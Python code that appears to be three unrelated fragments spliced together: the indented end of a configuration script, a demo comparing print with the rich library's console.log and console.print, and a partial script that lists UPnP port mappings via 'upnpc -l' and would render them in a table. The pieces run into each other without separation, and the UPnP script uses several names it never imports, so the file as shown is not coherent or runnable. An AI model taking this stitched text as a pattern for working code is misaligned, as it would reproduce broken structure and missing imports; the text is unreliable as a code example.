    ###########
    # Goodbye :)
    console.log('Configuration executed. Goodbye.')

    # Save log
    if arguments.log:
        console.save_text(os.path.join(executable.results_dir, 'log.txt'))
from rich.console import Console

# Plain stdout for comparison with rich's rendering below.
print("python print")

console = Console(force_terminal=True)
console.log(
    "console.log",
    [1, "str"],
    'https://github.com/willmcgugan/rich/blob/9cba2027f4/tests/test_color_triplet.py',
    {"k": 'v', "date": '00:46:54'},
    None,
    '2009-11-27T00:00:00.000100-06:39',
)
console.print(
    "console.print",
    [1, "str"],
    'https://github.com/willmcgugan/rich/blob/9cba2027f4/tests/test_color_triplet.py',
    {"k": 'v', "date": '00:46:54'},
    None,
    '2009-11-27T00:00:00.000100-06:39',
)
def print_ports(rem):
    """Render the detected UPnP port mappings as a numbered table."""
    t = Table("ID", "Port", "Protocol", "Connection Target")
    # Fix/idiom: enumerate replaces the manually maintained counter.
    for n, (_port, conn_type, ext) in enumerate(rem):
        t.add_row(str(n), str(_port), conn_type, ext)
    console.print(t)


if __name__ == "__main__":
    # Matches one `upnpc -l` listing line, capturing the local port and the
    # external ip:port target.
    lineRegex = re.compile(
        r"^\s*\d+\s(TCP|UDP)\s+(?P<port>\d{1,5})->(?P<ext>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}).+$",
        re.IGNORECASE | re.VERBOSE,  # fix: combine flags with |, not +
    )
    console.log("Detecting UPNP ports...")
    with Live(Spinner("aesthetic", "Getting UPnP Port Listings...", speed=0.1),
              transient=True):
        start = time.time()
        try:
            detection = run(["upnpc", "-l"], stdout=PIPE, stderr=DEVNULL)
        except KeyboardInterrupt:
            console.log("Listing cancelled.")
            sys.exit(1)
        end = time.time()
    if detection.returncode != 0:
        console.log(
            f"Got return code [red]{detection.returncode}[/] on UPnP List request. Please ensure UPnP is "
            f"enabled on your network.")
        sys.exit(detection.returncode)